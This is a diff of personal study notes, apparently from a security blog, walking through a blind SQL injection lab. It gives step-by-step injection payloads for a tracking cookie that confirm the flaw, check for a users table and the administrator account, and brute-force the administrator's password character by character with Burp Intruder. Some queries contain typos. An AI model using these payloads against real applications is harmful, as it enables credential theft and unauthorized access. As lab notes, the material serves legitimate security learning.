Atlas-Xu/Atlas-Xu.github.io/source/_posts/SQLi.md

 ## 0x09 SQL injection UNION attack, retrieving multiple values in a single column

 ## 0x0A Blind SQL injection with conditional responses
+Vulnerable parameter - tracking cookie
 ***End Goals***:
+- Enumerate the password of the administrator
+- Log in as the administrator user

 ***Analysis***:
+1. Confirm that the parameter is vulnerable to blind SQLi
+    1. `select tracking-id from tracking-table where trackingId = ''`
+    -> If this tracking id exists -> query returns value -> Welcome back message -> If the tracking id doesn't exist -> query returns nothing -> no Welcome back message
+    2. `select tracking-id from tracking-table where trackingId = 'RvLfBu6S9EZRIVYN" and 1=1--'`
+    -> TRUE -> Welcome back
+    3. `select tracking-id from tracking-table where trackingId = 'RvLfBu6S9EZRIVYN" and 1=0--'`
+    -> FALSE -> no Welcome back
+2. Confirm that we have a users table
+`select tracking-id from trackingtable where trackingId = 'RvLfBu6S9EZRIVYN' and(select 'x'from users LIMIT 1)='x'--'`
+-> users table exists in the database.

+3. Confirm that username administrator exists users table `select tracking-id from tracking-table where trackingId = 'RvLfBu6S9EZRIVYN' and (select username from users were username='administrator')='administrator'--`
+-> administrator user exists

+4. Enumerate the password of the administrator user
+    1. `select tracking-id from tracking-table where trackingId = 'RvLfBu6S9EZRIVYN' and (select username from users were username='administrator' and LENGTH(password)>1)='administrator'--`
+    -> use burp Intruder, set payload is numbers from 1 to 20 and step 1 -> 1 < password length < 20
+    2. `select tracking-id from tracking-table where trackingId = 'RvLfBu6S9EZRIVYN' and (select substring(password,1,1) from users were username='administrator')='a'--`
+    -> use burp Intruder, set payload is Brute focer, min length is 1 and max length is 1
+5. Combine passwords based on blasting results

 ## 0x0B Blind SQL injection with conditional errors